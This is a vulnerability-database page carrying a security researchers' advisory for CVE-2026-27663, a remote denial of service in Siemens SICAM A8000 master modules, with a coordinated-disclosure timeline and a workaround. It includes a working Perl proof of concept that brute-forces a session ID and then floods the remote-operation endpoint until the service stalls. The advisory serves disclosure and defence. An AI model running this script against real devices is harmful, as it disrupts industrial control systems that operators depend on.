Lucene search
K

๐Ÿ“„ Siemens SICAM A8000 25.30 Denial of Service

๐Ÿ—“๏ธย 15 Apr 2026ย 00:00:00Reported byย S. Dietz, T. Weber, F. Koroknai, D. BlagojevicTypeย 
packetstorm
ย packetstorm
๐Ÿ”—ย packetstorm.news๐Ÿ‘ย 72ย Views

Remote denial of service in Siemens SICAM A8000 master modules before version 26.10.

Related
Code
ReporterTitlePublishedViews
Family
ATTACKERKB
CVE-2026-27663
26 Mar 202614:03
โ€“attackerkb
Circl
CVE-2026-27663
26 Mar 202617:42
โ€“circl
CNNVD
Siemens CPCI85 Central Processing ๅฎ‰ๅ…จๆผๆดž
26 Mar 202600:00
โ€“cnnvd
CNVD
Denial of Service Vulnerability in Siemens SICAM 8 Products
31 Mar 202600:00
โ€“cnvd
CVE
CVE-2026-27663
26 Mar 202614:03
โ€“cve
Cvelist
CVE-2026-27663
26 Mar 202614:03
โ€“cvelist
EUVD
EUVD-2026-16179
26 Mar 202615:30
โ€“euvd
ICS
Siemens SICAM 8 Products
26 Mar 202600:00
โ€“ics
NVD
CVE-2026-27663
26 Mar 202615:16
โ€“nvd
Positive Technologies
PT-2026-28356
26 Mar 202600:00
โ€“ptsecurity
Rows per page
CyberDanube Security Research 20260408-0
    -------------------------------------------------------------------------------
                    title| Remote Operation Denial of Service
                  product| Siemens SICAM A8000 CP-8050/CP-8031/CP-8010/CP-8012
       vulnerable version| <=V25.30
            fixed version| V26.10
               CVE number| CVE-2026-27663
                   impact| Medium
                 homepage| https://siemens.com/
                    found| 28.11.2025
                       by| T. Weber, S. Dietz, D. Blagojevic, F. Koroknai
                         | (Office Vienna)
                         | CyberDanube Security Research
                         | Vienna | St. Pรถlten
                         |
                         | https://www.cyberdanube.com
    -------------------------------------------------------------------------------
    
    Vendor description
    -------------------------------------------------------------------------------
    "Our purpose: We create technology to transform the everyday, for everyone.
    By combining the real and the digital worlds, we can help accelerate both
    digitalization and sustainability - so our customers around the world can
    become more competitive, resilient and sustainable."
    
    Source: https://www.siemens.com/global/en/company/about.html
    
    
    Vulnerable versions
    -------------------------------------------------------------------------------
    Siemens SICAM A8000 CP-8050 Master Module (6MF2805-0AA00) / <=V25.30
    Siemens SICAM A8000 CP-8031 Master Module (6MF2803-1AA00) / <=V25.30
    Siemens SICAM A8000 CP-8010 Master Module (6MF2801-0AA00) / <=V25.31
    Siemens SICAM A8000 CP-8012 Master Module (6MF2801-2AA00) / <=V25.31
    
    See also the vendor advisory:
    https://cert-portal.siemens.com/productcert/html/ssa-246443.html
    
    Vulnerability overview
    -------------------------------------------------------------------------------
    1) Remote Operation Denial of Service (CVE-2026-27663)
    The remote operation mode is vulnerable to an uncontrolled resource exhaustion.
    By sending frequent requests, the service can be interrupted and the affected
    PLC can no longer be parameterized. This vulnerabilitiy can be triggered with
    less than 100 requests and stalls the service as log as it is restarted via the
    web interface or if the device is rebooted.
    
    
    Proof of Concept
    -------------------------------------------------------------------------------
    1) Remote Operation Denial of Service (CVE-2026-27663)
    The following script can be used to force the CPCI85 process into a denial of
    service state:
    -----------------------------------------------------
    #!/usr/bin/perl
    #Author: T. Weber
    #SICAM Remote Operation DoS <=V25.30
    use strict;
    use warnings;
    use LWP::UserAgent;
    use Parallel::ForkManager;
    
    $ENV{'PERL_LWP_SSL_VERIFY_HOSTNAME'} = 0;
    print "Enter target IP address: ";
    chomp(my $ip = <STDIN>);
    
    print "Enter target port: ";
    chomp(my $port = <STDIN>);
    
    print "Enter Y/N for HTTPS: ";
    chomp(my $tls = <STDIN>);
    
    if ($tls eq "Y") {
        $tls = "https";
    } elsif ($tls eq "N") {
        $tls = "http";
    } else {
        die "Invalid input for HTTPS (must be Y or N)\n";
    }
    
    my $server_endpoint = "$tls://$ip:$port/SICAM_TOOLBOX_1703_remote_connection_01.htm";
    print "Testing $server_endpoint\n";
    # user agent
    my $ua = LWP::UserAgent->new(
        ssl_opts   => { SSL_verify_mode => 0 },
        keep_alive => 1,
        agent      => "SICAM TOOLBOX II"
    );
    
    # brute force session
    my @hex = (0..9, 'A'..'F');
    my $found_session;
    for my $d1 (@hex) {
        for my $d2 (@hex) {
            for my $d3 (@hex) {
                for my $d4 (@hex) {
                    my $session_id = "008cfd320836$d1$d2$d3$d4";
                    my $req = HTTP::Request->new(POST => $server_endpoint);
                    $req->header('content-type'   => 'text/plain');
                    $req->header('Session-ID'     => $session_id);
                    $req->header('UPLOADFILENAME' => 'abc.f20');
                    $req->content('type=20&length=1&data=A');
    
                    my $resp = $ua->request($req);
    
                    if ($resp->is_success) {
                        print "[$session_id] OK: ", $resp->decoded_content, "\n";
                        if ($resp->decoded_content ne ""){
    โ€‚โ€‚โ€‚โ€‚โ€‚โ€‚โ€‚โ€‚โ€‚โ€‚โ€‚โ€‚โ€‚โ€‚โ€‚โ€‚โ€‚โ€‚โ€‚โ€‚โ€‚โ€‚โ€‚โ€‚โ€‚โ€‚โ€‚โ€‚โ€‚โ€‚โ€‚โ€‚โ€‚โ€‚โ€‚โ€‚print "found session\n";
    โ€‚โ€‚โ€‚โ€‚โ€‚โ€‚โ€‚โ€‚โ€‚โ€‚โ€‚โ€‚โ€‚โ€‚โ€‚โ€‚โ€‚โ€‚โ€‚โ€‚โ€‚โ€‚โ€‚โ€‚โ€‚โ€‚โ€‚โ€‚โ€‚โ€‚โ€‚โ€‚โ€‚โ€‚โ€‚โ€‚$found_session = $session_id;
    โ€‚โ€‚โ€‚โ€‚โ€‚โ€‚โ€‚โ€‚โ€‚โ€‚โ€‚โ€‚โ€‚โ€‚โ€‚โ€‚โ€‚โ€‚โ€‚โ€‚โ€‚โ€‚โ€‚โ€‚โ€‚โ€‚โ€‚โ€‚โ€‚โ€‚โ€‚โ€‚โ€‚โ€‚โ€‚โ€‚last;
    โ€‚โ€‚โ€‚โ€‚โ€‚โ€‚โ€‚โ€‚โ€‚โ€‚โ€‚โ€‚โ€‚โ€‚โ€‚โ€‚โ€‚โ€‚โ€‚โ€‚โ€‚โ€‚โ€‚โ€‚โ€‚โ€‚โ€‚โ€‚โ€‚โ€‚}
                    } else {
                        print "[$session_id] ERROR: ", $resp->status_line, "\n";
                    }
                }
                if ($found_session ne ""){
    โ€‚โ€‚โ€‚โ€‚โ€‚โ€‚โ€‚โ€‚โ€‚โ€‚โ€‚โ€‚โ€‚โ€‚โ€‚โ€‚โ€‚โ€‚โ€‚โ€‚โ€‚โ€‚โ€‚โ€‚last;
    โ€‚โ€‚โ€‚โ€‚โ€‚โ€‚โ€‚โ€‚โ€‚โ€‚โ€‚โ€‚โ€‚โ€‚โ€‚โ€‚โ€‚โ€‚}
            }
            if ($found_session ne ""){
    โ€‚โ€‚โ€‚โ€‚โ€‚โ€‚โ€‚โ€‚โ€‚โ€‚โ€‚โ€‚โ€‚โ€‚โ€‚โ€‚โ€‚โ€‚last;
    โ€‚โ€‚โ€‚โ€‚โ€‚โ€‚โ€‚โ€‚โ€‚โ€‚โ€‚โ€‚}
        }
        if ($found_session ne ""){
    โ€‚โ€‚โ€‚โ€‚โ€‚โ€‚โ€‚โ€‚โ€‚โ€‚โ€‚โ€‚last;
    โ€‚โ€‚โ€‚โ€‚โ€‚โ€‚}
    }
    
    #denial of remote operation
    my $max_procs = 10;
    my $pm = Parallel::ForkManager->new($max_procs);
    
    my @alpha = (0..9);
    for my $d1 (@alpha) {
        for my $d2 (@alpha) {
                $pm->start and next;
    โ€‚โ€‚โ€‚โ€‚โ€‚โ€‚โ€‚โ€‚โ€‚โ€‚โ€‚โ€‚โ€‚โ€‚โ€‚โ€‚โ€‚โ€‚my $len = "$d1$d2";
    โ€‚โ€‚โ€‚โ€‚โ€‚โ€‚โ€‚โ€‚โ€‚โ€‚โ€‚โ€‚โ€‚โ€‚โ€‚โ€‚โ€‚โ€‚
                my $req = HTTP::Request->new(POST => $server_endpoint);
                $req->header('content-type'   => 'text/plain');
                $req->header('Session-ID'     => $found_session);
                $req->header('UPLOADFILENAME' => 'abc.f20');
                $req->content('type=20&length='.$len.'&data=A');
                my $resp = $ua->request($req);
    
                if ($resp->is_success) {
                    print "DoS Running: ".$d1.$d2."\n";
                } else {
                    print "ERROR: ", $resp->status_line, "\n";
                }
                $pm->finish;
        }
    }
    $pm->wait_all_children;
    -----------------------------------------------------
    The service is still running but stalled and cannot be used anymore to set
    parameters via Toolbox II.
    
    
    Solution
    -------------------------------------------------------------------------------
    Install the latest version available.
    
    
    Workaround
    -------------------------------------------------------------------------------
    Activate the web-interface to restart the service if needed. Deactivate remote
    operation if not used. Restrict network access to the device in the
    infrastructure.
    
    
    Recommendation
    -------------------------------------------------------------------------------
    CyberDanube recommends to perform a white-box security assessment of the SICAM
    A8000 master module devices.
    
    
    Contact Timeline
    -------------------------------------------------------------------------------
    2025-12-12: Contacting Siemens PSIRT. Siemens ProductCERT confirms issues.
    2026-01-13: Siemens ProductCERT confirms to work on a fix.
    2026-01-16: Siemens ProductCERT asks for more information regarding the
                exploitation. Provided more information.
    2026-02-18: Asked for an update. Siemens ProductCERT provided a preliminary
                timeline.
    2026-03-26: Siemens informs that patch has been released. Providing more time
                for customer to patch. Siemens published Advisory
    2026-04-08: Coordinated release of security advisory.
    
    Web: https://www.cyberdanube.com
    Twitter: https://twitter.com/cyberdanube
    Mail: research at cyberdanube dot com
    
    EOF T. Weber / @2026

Data

Build on a solid foundation withย Vulners data

Weย provide theย essential building blocks forย cybersecurity solutions withย comprehensive, structured, andย constantly updated vulnerability andย exploits data

Api

Power your application withย Vulners API

The Vulners REST API offers reliable, high-performance access toย vulnerabilityย intelligence, withย 99.9%ย SLAย uptime andย CDN-backed data delivery forย seamlessย global access

App

Assess and manage vulnerabilities withย Vulnersย tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

15 Apr 2026 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 3.16.5
CVSS 47.1
EPSS0.00008
SSVC
72